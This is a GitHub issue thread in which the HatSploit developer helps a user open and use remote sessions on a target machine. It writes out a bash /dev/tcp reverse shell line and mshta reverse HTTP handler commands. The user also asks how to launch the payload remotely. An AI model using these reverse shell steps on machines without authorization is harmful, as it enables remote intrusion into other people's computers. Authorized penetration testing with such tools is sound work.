EntySec / HatSploit

Modular penetration testing platform that enables you to write, test, and execute exploit code.
https://hatsploit.com
MIT License

Great Project #78

Closed Gabl00 closed 2 years ago

Gabl00 commented 2 years ago

I find this project very interesting and useful. I was able to install and establish connections to a remote PC, but I wasn't able to send commands.

Could you please make an example of how to send commands after successful connections?

thanks

you are awesome brother !!

enty8080 commented 2 years ago

Hi, @Gabl00

I am glad you liked my work. Can you send me screenshots of the terminal output or your problem?

If you have any trouble with opening an interactive session with an infected machine, you can just use sessions -l and then sessions -i <session_id>.

So, attach screenshots and here is wiki BTW.

Best regards, Ivan Nikolsky (@enty8080)

Gabl00 commented 2 years ago

image

screenshot attached .. I followed the payload command here >> https://github.com/EntySec/HatSploit/wiki/HatSploit-Payloads

the connection was successful but when I tried to run a command it disconnects.. in this case, I tried to download a file image.png from the connected user.

enty8080 commented 2 years ago

@Gabl00 What command have you entered on target system?

Because as you can see it sends RAW HTTP response.

Gabl00 commented 2 years ago

sessions -d

perhaps if you could give an example on how to run a command to download and upload files

enty8080 commented 2 years ago

@Gabl00 No, what command have you entered on the target machine?

Before the session has been opened. You have done something incorrectly because you are receiving an HTTP response.

Gabl00 commented 2 years ago

sessions -d C:\Users\USERS\Desktop\image.jpg D:\Users\Desktop

enty8080 commented 2 years ago

@Gabl00

Show me all the steps please, all commands and payload name. Also, the command that you have entered in the target terminal window before the session was opened.

Gabl00 commented 2 years ago

you may be right on this.. perhaps I did something wrong here.. well, I followed the payload instructions exactly

enty8080 commented 2 years ago

@Gabl00 Execute this command and send me output please.

show options

enty8080 commented 2 years ago

@Gabl00 Okay, and what have you done on target machine after you executed run?

Gabl00 commented 2 years ago

image

enty8080 commented 2 years ago

@Gabl00 Okay, and what have you done on the target machine after you executed run? Have you typed something like this on target terminal - bash &>/dev/tcp/<ip>/<port> 0>&1>

enty8080 commented 2 years ago

@Gabl00 Looks like I found why you are not able to open a proper session. You are opening a URL on the target, but you should not do this.

Gabl00 commented 2 years ago

> @Gabl00 Looks like I found why you are not able to open a proper session. You are opening a URL on the target, but you should not do this.

Yes, I opened the URL on the target machine

enty8080 commented 2 years ago

@Gabl00 Unfortunately this is not how it works.

enty8080 commented 2 years ago

@Gabl00

Do this:

use exploit/windows/handler/mshta_reverse_http
set rhost <your_ip>
run

And then on target in cmd.exe:

mshta http://<your_ip>:8080/

Hope this will help you.

enty8080 commented 2 years ago

@Gabl00 Sorry, I am closing this issue because there is no bug in HatSploit.

Gabl00 commented 2 years ago

AWESOME !!!!

this works.. but then how can I run this cmd remotely on a target machine

enty8080 commented 2 years ago

@Gabl00 Can you show me output, did cmd pop-up?

enty8080 commented 2 years ago

@Gabl00 Also, you will not be able to use sessions -d on Windows targets because it is now supported only for Unix-like systems.

enty8080 commented 2 years ago

@Gabl00 To save the session and continue working in HatSploit, type quit, and then if you would like to interact with it again, type sessions -i 0

Gabl00 commented 2 years ago

image

enty8080 commented 2 years ago

@Gabl00 Now, just type quit to exit interactive mode.

Gabl00 commented 2 years ago

ok, thanks a lot man, I appreciate this a lot .. this app is just beautiful and very useful for remotely connecting with work colleagues or clients for troubleshooting etc

does it work with a GUI ?

enty8080 commented 2 years ago

@Gabl00 I am working on this project alone and it is only in the early stages of development, so there is no GUI at all. I tried developing this one - https://github.com/EntySec/HatBoard, but it is really unstable right now.

Gabl00 commented 2 years ago

this is awesome.. I'm going to set it ..

perhaps you can add your wallets for donations ..

I'm really interested in your works

enty8080 commented 2 years ago

@Gabl00 Thank you for your interest :)